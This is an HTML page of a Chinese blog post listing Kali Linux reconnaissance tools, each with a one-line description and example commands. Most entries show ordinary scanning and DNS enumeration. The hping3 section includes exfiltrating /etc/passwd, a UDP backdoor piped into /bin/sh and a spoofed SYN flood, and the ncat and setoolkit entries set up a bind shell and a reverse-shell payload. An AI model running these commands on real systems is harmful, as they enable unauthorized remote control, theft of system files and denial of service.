<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="kali,tool,information gathering," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="概述Kali 里预装了很多安全与取证的相关工具，但是我所了解的却只有sqlmap、msf、nmap等少数几个，对于其他的却并没过多关注。于是今天想着整理一下Kali有关信息收集的工具，便于以后备查。">
<meta property="og:type" content="article">
<meta property="og:title" content="Kali Information Gathering">
<meta property="og:url" content="http://orleven.com/2016/09/27/kali-information-gathering/index.html">
<meta property="og:site_name" content="Orleven Blog">
<meta property="og:description" content="概述Kali 里预装了很多安全与取证的相关工具，但是我所了解的却只有sqlmap、msf、nmap等少数几个，对于其他的却并没过多关注。于是今天想着整理一下Kali有关信息收集的工具，便于以后备查。">
<meta property="og:updated_time" content="2017-03-14T06:37:47.849Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Kali Information Gathering">
<meta name="twitter:description" content="概述Kali 里预装了很多安全与取证的相关工具，但是我所了解的却只有sqlmap、msf、nmap等少数几个，对于其他的却并没过多关注。于是今天想着整理一下Kali有关信息收集的工具，便于以后备查。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://orleven.com/2016/09/27/kali-information-gathering/"/>





  <title> Kali Information Gathering | Orleven Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Orleven Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Orleven Blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://orleven.com/2016/09/27/kali-information-gathering/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Orleven">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/orleven.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Orleven Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Kali Information Gathering
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-09-27T03:22:12+08:00">
                2016-09-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>Kali 里预装了很多安全与取证的相关工具，但是我所了解的却只有sqlmap、msf、nmap等少数几个，对于其他的却并没过多关注。于是今天想着整理一下Kali有关<code>信息收集</code>的工具，便于以后备查。 </p>
<a id="more"></a>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="acccheck："><a href="#acccheck：" class="headerlink" title="acccheck："></a>acccheck：</h2><p>描述：该工具被设计为一个密码字典攻击的工具，目标Windows身份验证通过SMB协议。</p>
<h2 id="ace："><a href="#ace：" class="headerlink" title="ace："></a>ace：</h2><p>描述：不明。</p>
<h2 id="amap："><a href="#amap：" class="headerlink" title="amap："></a>amap：</h2><p>描述：一个服务器枚举工具，使用这个工具可以识别正运行在一个指定端口或一个范围端口上的应用程序。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ amap -bq 192.168.1.110 1-1000</div></pre></td></tr></table></figure></p>
<h2 id="Automater"><a href="#Automater" class="headerlink" title="Automater"></a>Automater</h2><p>描述：automater是分析URL的域名，IP地址，和MD5哈希OSINT工具。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$ automater  baidu.com</div><div class="line">$ automater <span class="_">-s</span> robtex 50.116.53.73</div></pre></td></tr></table></figure></p>
<h2 id="braa"><a href="#braa" class="headerlink" title="braa"></a>braa</h2><p>描述：一个SNMP的扫描工具<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ braa  public@192.168.0.1:.1.3.6.*</div></pre></td></tr></table></figure></p>
<h2 id="casefile"><a href="#casefile" class="headerlink" title="casefile"></a>casefile</h2><p>描述：服务枚举：如DNS枚举<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ casefile</div></pre></td></tr></table></figure></p>
<h2 id="cdpsnarf"><a href="#cdpsnarf" class="headerlink" title="cdpsnarf"></a>cdpsnarf</h2><p>描述：网络嗅探器，从CDP数据包中提取信息<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ cdpsnarf -i eth0 -w cdpsnarf.pcap</div></pre></td></tr></table></figure></p>
<h2 id="cisco-torch"><a href="#cisco-torch" class="headerlink" title="cisco-torch"></a>cisco-torch</h2><p>描述：快速发现远程Cisco的主机上运行Telnet、SSH、WEB、SNMP服务和启动NTP和字典攻击的服务发现。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ cisco-torch -A 192.168.99.202</div></pre></td></tr></table></figure></p>
<h2 id="copy-router-config"><a href="#copy-router-config" class="headerlink" title="copy-router-config"></a>copy-router-config</h2><p>描述：从思科设备上运行的SNMP拷贝配置文件。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ copy-router-config.pl 192.168.1.1 192.168.1.15 private</div></pre></td></tr></table></figure></p>
<h2 id="dmitry"><a href="#dmitry" class="headerlink" title="dmitry"></a>dmitry</h2><p>描述：收集可能的子域，电子邮件地址，正常运行时间的信息，TCP端口扫描，查找，和更多。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dmitry baidu.com</div></pre></td></tr></table></figure></p>
<h2 id="dnmap"><a href="#dnmap" class="headerlink" title="dnmap"></a>dnmap</h2><p>描述：DNmap是一款基于Nmap的分布式框架，使用客户端/服务端架构，服务器接收命令并发送至客户端进行Nmap安全扫描，扫描完毕后，客户端返回扫描结果。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># dnmap_server：</span></div><div class="line">$ <span class="built_in">echo</span> <span class="string">"nmap -F 192.168.1.0/24 -v -n -oA sub1"</span> &gt;&gt; dnmap.txt</div><div class="line">$ <span class="built_in">echo</span> <span class="string">"nmap -F 192.168.0.0/24 -v -n -oA sub0"</span> &gt;&gt; dnmap.txt</div><div class="line">$ dnmap_server <span class="_">-f</span> dnmap.txt</div><div class="line"></div><div class="line"><span class="comment"># dnmap_client：</span></div><div class="line"><span class="comment">#                (dnmap_server的ip)(dnmap_client的别名)</span></div><div class="line">$ dnmap_client <span class="_">-s</span>  192.168.1.15   <span class="_">-a</span>    dnmap-client1</div></pre></td></tr></table></figure></p>
<h2 id="dnsenum"><a href="#dnsenum" class="headerlink" title="dnsenum"></a>dnsenum</h2><p>描述：枚举域DNS信息和发现不连续的IP模块。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dnsenum --noreverse -o mydomain.xml example.com</div></pre></td></tr></table></figure></p>
<h2 id="dnsmap"><a href="#dnsmap" class="headerlink" title="dnsmap"></a>dnsmap</h2><p>描述：枚举域DNS信息。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dnsmap example.com -w /usr/share/wordlists/dnsmap.txt</div></pre></td></tr></table></figure></p>
<h2 id="dnsrecon"><a href="#dnsrecon" class="headerlink" title="dnsrecon"></a>dnsrecon</h2><p>描述：直接出来目标服务器的 DNS名字 和 IP<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dnsrecon <span class="_">-d</span> example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml</div></pre></td></tr></table></figure></p>
<h2 id="dnstracer"><a href="#dnstracer" class="headerlink" title="dnstracer"></a>dnstracer</h2><p>描述：直接出来目标服务器的 DNS名字 和 IP<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dnstracer -r 3 -v example.com</div></pre></td></tr></table></figure></p>
<h2 id="dnswalk"><a href="#dnswalk" class="headerlink" title="dnswalk"></a>dnswalk</h2><p>描述：DNS的调试器。它执行特定区域的区域传输，并检查数据库在许多方面的内部一致性，以及准确性。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$ dnswalk example.com.</div><div class="line">$ dnswalk -r <span class="_">-d</span> example.com.</div></pre></td></tr></table></figure></p>
<h2 id="dotdotpwn-pl"><a href="#dotdotpwn-pl" class="headerlink" title="dotdotpwn.pl"></a>dotdotpwn.pl</h2><p>描述:测试发现软件例如HTTP、FTP、TFTP服务器遍历目录的漏洞，网络平台如CMS、ERP、博客等。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ dotdotpwn.pl -m http -h 192.168.1.1 -M GET</div></pre></td></tr></table></figure></p>
<h2 id="enum4linux"><a href="#enum4linux" class="headerlink" title="enum4linux"></a>enum4linux</h2><p>描述:枚举Windows主机和Samba 主机。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ enum4linux -U -o 192.168.1.200</div></pre></td></tr></table></figure></p>
<h2 id="enumiax"><a href="#enumiax" class="headerlink" title="enumiax"></a>enumiax</h2><p>描述: Inter Asterisk Exchange 协议 的用户名蛮力枚举。 enumiax可能在两种不同的模式操作； 顺序用户名猜测或字典攻击。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ enumiax <span class="_">-d</span> /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1</div></pre></td></tr></table></figure></p>
<h2 id="Fierce"><a href="#Fierce" class="headerlink" title="Fierce"></a>Fierce</h2><p>描述: ip 扫描器<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ fierce -dns example.com</div></pre></td></tr></table></figure></p>
<h2 id="fragroute"><a href="#fragroute" class="headerlink" title="fragroute"></a>fragroute</h2><p>描述: fragroute能够截取、修改和重写向外发送的报文，实现大部分在了Secure Networks Inser<br>tion, Evasion, and Denial of Service: Eluding Network Intrusion Detection中叙述的<br>IDS欺骗技术，包括IP、TCP层的数据包碎片以及数据包数据重叠等。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># fragroute：</span></div><div class="line">$ fragroute 192.168.1.123</div><div class="line"></div><div class="line"><span class="comment"># fragtest ：</span></div><div class="line">$ fragtest ip-tracert frag-new 192.168.1.123</div></pre></td></tr></table></figure></p>
<h2 id="ghost-phisher"><a href="#ghost-phisher" class="headerlink" title="ghost-phisher"></a>ghost-phisher</h2><p>描述: 是无线和以太网的安全审计和攻击软件<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ ghost-phisher</div></pre></td></tr></table></figure></p>
<h2 id="GoLismero"><a href="#GoLismero" class="headerlink" title="GoLismero"></a>GoLismero</h2><p>描述: web漏洞扫描<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 扫描一个网站，并显示在屏幕上的结果:</span></div><div class="line">$ golismero scan http://www.0535code.com</div><div class="line"><span class="comment"># 获取nmap结果，扫描发现所有主机写HTML报告:</span></div><div class="line">$ golismero scan -i nmap_output.xml -o report.html</div><div class="line"><span class="comment"># 获取结果OpenVAS和它们显示在屏幕上，但不扫描任何东西:</span></div><div class="line">$ golismero import -i openvas_output.xml</div><div class="line"><span class="comment"># 显示所有可用配置文件的列表:</span></div><div class="line">$ golismero profiles</div><div class="line"><span class="comment"># 显示所有可用插件的列表:</span></div><div class="line">$ golismero plugins</div><div class="line"><span class="comment"># 显示所有信息和插件:</span></div><div class="line">$ golismero info brute_*</div><div class="line"><span class="comment"># 从以前的扫描中转储数据库:</span></div><div class="line">$ golismero dump -db example.db -o dump.sql</div></pre></td></tr></table></figure></p>
<h2 id="hping3"><a href="#hping3" class="headerlink" title="hping3"></a>hping3</h2><p>描述: hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。</span></div><div class="line">$ hping3 -S -c 1000000 <span class="_">-a</span> 10.10.10.10 -p 21 10.10.10.10</div><div class="line"><span class="comment"># 端口扫描</span></div><div class="line">$ hping3 -I eth0 -S 192.168.10.1 -p 80</div><div class="line"><span class="comment"># 对目标机发起大量SYN连接</span></div><div class="line">$ hping3 -I eth0 <span class="_">-a</span>192.168.10.99 -S 192.168.10.33 -p 80 -i u1000</div><div class="line"><span class="comment"># 文件传输</span></div><div class="line">	<span class="comment"># 接收端：</span></div><div class="line">	$ hping3 192.168.1.159 --listen signature --safe --icmp</div><div class="line">	<span class="comment"># 发送端：</span></div><div class="line">	$ hping3 192.168.1.108 --icmp <span class="_">-d</span> 100 --sign signature --file /etc/passwd</div><div class="line"><span class="comment"># 木马功能</span></div><div class="line">	<span class="comment"># 被控制端：</span></div><div class="line">	$ hping3  127.0.0.1  --listen signature --safe --udp -p 12345 | /bin/sh</div><div class="line">	<span class="comment"># 控制端：</span></div><div class="line">	$ <span class="built_in">echo</span> ls &gt; test.cmd</div><div class="line">	$ hping3 127.0.0.1 -p 12345 <span class="_">-d</span> 100 --udp --sign signature --file ./test.cmd</div></pre></td></tr></table></figure></p>
<h2 id="intrace"><a href="#intrace" class="headerlink" title="intrace"></a>intrace</h2><p>描述:InTrace 是一个类似 traceroute 的应用，用户可以针对已建立的 TCP 连接跟踪其 IP 的跳跃。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ intrace -h www.example.com -p 80 <span class="_">-s</span> 4</div></pre></td></tr></table></figure></p>
<h2 id="lbd"><a href="#lbd" class="headerlink" title="lbd"></a>lbd</h2><p>描述:检测是否一个给定的域使用DNS或HTTP负载平衡（通过服务器：日期：服务器响应头和之间的差别）。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ lbd example.com</div></pre></td></tr></table></figure></p>
<h2 id="maltego"><a href="#maltego" class="headerlink" title="maltego"></a>maltego</h2><p>描述:收集DNS信息等。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ maltego</div></pre></td></tr></table></figure></p>
<h2 id="masscan"><a href="#masscan" class="headerlink" title="masscan"></a>masscan</h2><p>描述:快速的端口扫描工具。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 扫描202.203.122.122的80端口，速率为10Kpps</span></div><div class="line">$ masscan -p 80 202.203.122.122 --rate=10000　</div><div class="line"><span class="comment"># 扫描202.203.122.122的0-8100的端口，扫描结果输出到output.txt（二进制）（--banners选项值旗标，或者指纹）</span></div><div class="line">$ masscan -p 0-8100 202.203.122.122 --banners -oB output.txt　</div><div class="line"><span class="comment"># 打开显示模式，读取output.txt中的数据，并以xml的格式写到2.txt中</span></div><div class="line">$ masscan --open --banners --readscan output.txt -oX 2.txt</div></pre></td></tr></table></figure></p>
<h2 id="Miranda"><a href="#Miranda" class="headerlink" title="Miranda"></a>Miranda</h2><p>描述:操作系统探测工具。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 打开网卡eth0</span></div><div class="line">$ miranda -v -i eth0</div><div class="line">	<span class="comment"># 自动搜索upnp主机</span></div><div class="line">	upnp&gt;  msearch	</div><div class="line">	upnp&gt; host list</div><div class="line">	<span class="comment"># 查看该主机的upnp设备列表</span></div><div class="line">	upnp&gt; host get [index]</div></pre></td></tr></table></figure></p>
<h2 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h2><p>描述:网络探测工具和安全/端口扫描器。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">$ Nmap [ 扫描类型 ... ] [ 通用选项 ] &#123; 扫描目标说明 &#125;</div><div class="line">$ nmap -v -A <span class="_">-s</span>V 192.168.1.1</div><div class="line"><span class="comment"># 全面扫描：</span></div><div class="line">$ nmap -T4 -A targetip</div><div class="line"><span class="comment"># 主机发现：</span></div><div class="line">$ nmap -T4 -sn targetip</div><div class="line"><span class="comment"># 端口扫描：</span></div><div class="line">$ nmap -T4 targetip</div><div class="line"><span class="comment"># 服务扫描：</span></div><div class="line">$ nmap -T4 <span class="_">-s</span>V targetip</div><div class="line"><span class="comment"># 操作系统扫描：</span></div><div class="line">$ nmap -T4 -O targetip</div><div class="line"><span class="comment"># SYN扫描:</span></div><div class="line">$ nmap <span class="_">-s</span>S -T4 targetip</div><div class="line"><span class="comment"># FIN扫描:</span></div><div class="line">$ nmap <span class="_">-s</span>F -T4 targetip</div><div class="line"><span class="comment"># ACK扫描:</span></div><div class="line">$ nmap <span class="_">-s</span>A -T4 targetip</div><div class="line"><span class="comment"># UDP扫描:</span></div><div class="line">$ NMAP <span class="_">-s</span>U targetip</div><div class="line"><span class="comment"># 漏洞扫描：</span></div><div class="line">$ nmap <span class="_">-s</span>S <span class="_">-s</span>V --script=vulscan/vulscan.nse target</div><div class="line">$ nmap <span class="_">-s</span>S <span class="_">-s</span>V --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target</div><div class="line">$ nmap <span class="_">-s</span>S <span class="_">-s</span>V --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target</div><div class="line">$ nmap -PN <span class="_">-s</span>S <span class="_">-s</span>V --script=vulscan –script-args vulscancorrelation=1 -p80 target</div><div class="line">$ nmap <span class="_">-s</span>V --script=vuln target</div><div class="line">$ nmap -PN <span class="_">-s</span>S <span class="_">-s</span>V --script=all –script-args vulscancorrelation=1 target</div></pre></td></tr></table></figure></p>
<h2 id="nping"><a href="#nping" class="headerlink" title="nping"></a>nping</h2><p>描述:网络数据包生成工具/平实用程序。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ nping --tcp -p 22 --flags syn --ttl 2 192.168.1.1</div></pre></td></tr></table></figure></p>
<h2 id="ndiff"><a href="#ndiff" class="headerlink" title="ndiff"></a>ndiff</h2><p>描述:实用工具Nmap扫描的结果比较。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ ndiff yesterday.xml today.xml</div></pre></td></tr></table></figure></p>
<h2 id="ncat"><a href="#ncat" class="headerlink" title="ncat"></a>ncat</h2><p>描述:连接和重定向的套接字。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ ncat -v --exec <span class="string">"/bin/bash"</span> --allow 192.168.1.123 <span class="_">-l</span> 4444 --keep-open</div></pre></td></tr></table></figure></p>
<h2 id="p0f"><a href="#p0f" class="headerlink" title="p0f"></a>p0f</h2><p>描述:是一款被动探测工具,通过分析网络数据包来判断操作系统<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ p0f -i eth0 -p -o /tmp/p0f.log</div></pre></td></tr></table></figure></p>
<h2 id="Recon-ng"><a href="#Recon-ng" class="headerlink" title="Recon-ng"></a>Recon-ng</h2><p>描述:与msf类似，Recon-ng框架是一个强大的工具，使用它可以自动的收集信息和网络侦查。<br>用法:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">$ recon-ng </div><div class="line">	<span class="comment"># 查看所有命令：</span></div><div class="line">	[recon-ng][default]&gt; <span class="built_in">help</span> </div><div class="line">	<span class="comment"># 查看所有有效的模块列表：</span></div><div class="line">	[recon-ng][default]&gt; show modules </div><div class="line">	<span class="comment"># 使用recon/domains-hosts/baidu_site模块，枚举baidu网站的子域：</span></div><div class="line">	[recon-ng][default]&gt; use recon/domains-hosts/baidu_site </div><div class="line">	<span class="comment"># 查看该模块下可配置选项参数：</span></div><div class="line">	[recon-ng][default][baidu_site]&gt; show options </div><div class="line">	<span class="comment"># 配置SOURCE选项参数：</span></div><div class="line">	[recon-ng][default][baidu_site]&gt; <span class="built_in">set</span> SOURCE baidu.com </div><div class="line">	<span class="comment"># 启动信息收集：</span></div><div class="line">	[recon-ng][default][baidu_site]&gt; run </div><div class="line">	<span class="comment"># 查看获取的数据：</span></div><div class="line">	[recon-ng][default]&gt; use reporting/csv </div><div class="line">	<span class="comment"># 创建报告：</span></div><div class="line">	[recon-ng][default][csv]&gt; run</div></pre></td></tr></table></figure></p>
<h2 id="searchsploit"><a href="#searchsploit" class="headerlink" title="searchsploit"></a>searchsploit</h2><p>描述: 从Exploit Database搜索exp<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$ searchsploit oracle windows remote</div><div class="line">$ searchsploit linux kernel 2.6</div></pre></td></tr></table></figure></p>
<h2 id="setoolkit"><a href="#setoolkit" class="headerlink" title="setoolkit"></a>setoolkit</h2><p>描述: 社会工程师工具包<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">$ setoolkit</div><div class="line">	<span class="comment"># 根据自己的需要，选择相应的编号进行操作:</span></div><div class="line">	<span class="built_in">set</span>&gt; 1</div><div class="line">	<span class="built_in">set</span>&gt; 4</div><div class="line">	<span class="comment"># 根据自己的目标系统选择相应的攻击载荷:</span></div><div class="line">	<span class="built_in">set</span>:payloads&gt; 2</div><div class="line">	<span class="comment"># 输入攻击者的ip、端口：</span></div><div class="line">	<span class="built_in">set</span>:payloads&gt; IP address <span class="keyword">for</span> the payload listener (LHOST):192.168.0.212 </div><div class="line">	<span class="built_in">set</span>:payloads&gt; Enter the PORT <span class="keyword">for</span> the reverse listener:1234</div></pre></td></tr></table></figure></p>
<h2 id="smtp-user-enum"><a href="#smtp-user-enum" class="headerlink" title="smtp-user-enum"></a>smtp-user-enum</h2><p>描述: SMTP用户枚举是一个工具，用于枚举操作系统级别的用户帐户在Solaris通过SMTP服务（邮件）。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ smtp-user-enum -M VRFY -u root -t 192.168.1.25</div></pre></td></tr></table></figure></p>
